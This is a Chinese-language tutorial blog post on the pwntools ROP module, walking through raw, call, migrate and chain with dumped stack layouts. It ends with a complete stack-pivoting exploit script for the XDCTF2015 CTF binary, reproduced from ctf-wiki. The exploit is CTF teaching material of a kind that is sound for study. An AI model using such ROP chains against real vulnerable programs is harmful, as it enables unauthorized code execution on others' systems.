pwntools_3 ROP模块

1.首先对某可执行文件创建一个rop对象

In [57]: rop=ROP('main')
[*] '/home/u/rop/main'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
[*] Loaded cached gadgets for 'main'

In [58]: rop
Out[58]: ROP([ELF('/home/u/rop/main')])

预览一下所有属性和方法:

In [59]: rop.
rop.base                   rop.elfs                   rop.leave                  rop.resolve
rop.build                  rop.find_gadget            rop.migrate                rop.search
rop.call                   rop.find_stack_adjustment  rop.migrated               rop.search_iter
rop.chain                  rop.from_blob              rop.pivots                 rop.setRegisters
rop.describe               rop.gadgets                rop.raw                    rop.unresolve
rop.dump                   rop.generatePadding        rop.regs                   

方法raw:手动添加数据

In [72]: rop.raw("a"*10)

这样rop中添加了10个padding,如果知道了离覆盖返回地址的长度,可以先填充字符串或者0x90
方法dump:
会将已经构建的栈数据输出,而且方便阅读
方法:call:

rop.call('read',[1,2,3])
print rop.dump()
0x0000:           'aaaa' 'aaaaaaaaaa'
0x0004:           'aaaa'
0x0008:           'aaaa'
0x000c:        0x80483a0 read(1, 2, 3)
0x0010:           'eaaa' <return address>
0x0014:              0x1 arg0
0x0018:              0x2 arg1
0x001c:              0x3 arg2

第一个参数为目标函数符号名,第二个参数是个list,作为目标函数的参数.然后构建出数据拼接到已有的数据中
或者使用rop.read(1,2,3):效果和call一样.细心点可以发现前一个read后的返回地址改成了栈调整的数据.rop模块会自动寻找gadget来连接上2次功能调用

print rop.dump()
0x0000:           'aaaa' 'aaaaaaaaaa'
0x0004:           'aaaa'
0x0008:           'aaaa'
0x000c:        0x80483a0 read(1, 2, 3)
0x0010:        0x8048376 <adjust @0x20> add esp, 8; pop ebx; ret
0x0014:              0x1 arg0
0x0018:              0x2 arg1
0x001c:              0x3 arg2
0x0020:        0x80483a0 read(1, 2, 3)
0x0024:           'jaaa' <return address>
0x0028:              0x1 arg0
0x002c:              0x2 arg1
0x0030:              0x3 arg2

rop.unresolve('main') 返回符号的地址

方法:rop.migrate(地址)

rop.migrate(2)
print rop.dump()
0x0000:           'aaaa' 'aaaaaaaaaa'
0x0004:           'aaaa'
0x0008:           'aaaa'
0x000c:        0x80483a0 read(1, 2, 3)
0x0010:        0x8048376 <adjust @0x20> add esp, 8; pop ebx; ret
0x0014:              0x1 arg0
0x0018:              0x2 arg1
0x001c:              0x3 arg2
0x0020:        0x80483a0 read(1, 2, 3)
0x0024:        0x8048376 <adjust @0x34> add esp, 8; pop ebx; ret
0x0028:              0x1 arg0
0x002c:              0x2 arg1
0x0030:              0x3 arg2
0x0034:        0x804861b pop ebp; ret
0x0038:             -0x2
0x003c:        0x8048458 leave; ret

从代码中可以看到,第2个read的返回地址被调整为 0x8048376 <adjust @0x34> add esp, 8; pop ebx; ret.
执行完后esp指向-2,并且进入 0x804861b pop ebp; ret执行代码,然后ebp被置为-2.如果此处换成其他地址,则栈就被迁移到另外一个地方去了.ret后,进入leave;ret,执行完后ebp为[-2],进入新栈的第二个4B地址处,esp指向新栈的第三个4B地址处. 为什么这里是-2,而不是2,因为这个函数的参数是当0x003c: 0x8048458 leave; ret
执行后,eip的去向, 当执行完leave之后,esp指向2(因为leave==mov esp,ebp;pop ebp),ret后,eip会转向地址2处的地址,即通过栈迁移后控制程序往哪里执行.

方法:rop.chain()

rop.chain()
'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\xa0\x83\x04\x08v\x83\x04\x08\x00\x00\x00\x00@\xa8\x04\x08d\x00\x00\x00\x1b\x86\x04\x08<\xa8\x04\x08X\x84\x04\x08'

返回完整的shellcode

有时候一次运行需要多次rop,再次重新生成rop,则重新调用ROP(path)创建一个rop即可

典型实例:

#coding:utf-8
#原文来源于ctf-wiki:https://github.com/ctf-wiki/ctf-wiki
from pwn import *
elf = ELF('main')
r = process('./main')
rop = ROP('./main')

offset = 112
bss_addr = elf.bss()

r.recvuntil('Welcome to XDCTF2015~!\n')

## stack pivoting to bss segment
## new stack size is 0x800
stack_size = 0x800
base_stage = bss_addr + stack_size
### padding offset是缓冲区里返回地址的距离,这块直接填充
rop.raw('a' * offset)
### read 100 byte to base_stage
#添加read函数,当源程序的vuln函数返回时被劫持进入read函数,此时会等待输入,也就是将第二个rop写入到
#base_stage中
rop.read(0, base_stage, 100)
### stack pivoting, set esp = base_stage
rop.migrate(base_stage)
#将第一个rop发送后,程序流程被劫持到read
#函数,此时程序等待输入等本脚本的下面的sendline执行后,会将下面的定义的rop给read到base_stage中去
#然后第一个rop的rop.migrate(base_stage)会将程序流程又转到[base_stage],因为此时的base_stage被read
#函数写入了第二个rop,其中第二个rop的开始就是rop.write(1, base_stage + 80, len(sh)),因此进入了第二rop的执行流程这时就会把字符串/bin/sh打印出来

r.sendline(rop.chain()) 

## write cmd="/bin/sh"
rop = ROP('./main')
sh = "/bin/sh"
rop.write(1, base_stage + 80, len(sh))
rop.raw('a' * (80 - len(rop.chain())))
rop.raw(sh)
rop.raw('a' * (100 - len(rop.chain())))

r.sendline(rop.chain())
r.interactive()
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 159,569评论 4 363
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 67,499评论 1 294
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 109,271评论 0 244
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 44,087评论 0 209
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 52,474评论 3 287
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 40,670评论 1 222
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 31,911评论 2 313
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 30,636评论 0 202
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 34,397评论 1 246
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 30,607评论 2 246
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 32,093评论 1 261
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 28,418评论 2 254
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 33,074评论 3 237
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 26,092评论 0 8
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 26,865评论 0 196
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 35,726评论 2 276
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 35,627评论 2 270

推荐阅读更多精彩内容

  • Return-Oriented-Programming(ROP FTW) Author: Saif El-Sher...
    RealSys阅读 3,232评论 0 2
  • 首先寄存器使用惯例:eip :指令地址寄存器,保存程序计数器的值,当前执行的指令的下一条指令的地址值,16位中为i...
    扎Zn了老Fe阅读 1,872评论 0 0
  • 原文地址:C语言函数调用栈(一)C语言函数调用栈(二) 0 引言 程序的执行过程可看作连续的函数调用。当一个函数执...
    小猪啊呜阅读 4,507评论 1 19
  • 我们是自由的信徒,像风一般没有归宿。从不会为谁而停留。风吹动树叶沙沙作响的声音仿佛心脏在跳动。未来也许会有彩虹,也...
    喜欢月亮的太阳花阅读 244评论 0 1
  • 下午二时,沿东北步行街东向走,左手边是苏州博物馆,右边三百米外是狮子林,前走两百米是拙政园,隔壁是苏州园林博物馆。...
    追风去啦啦啦阅读 276评论 1 0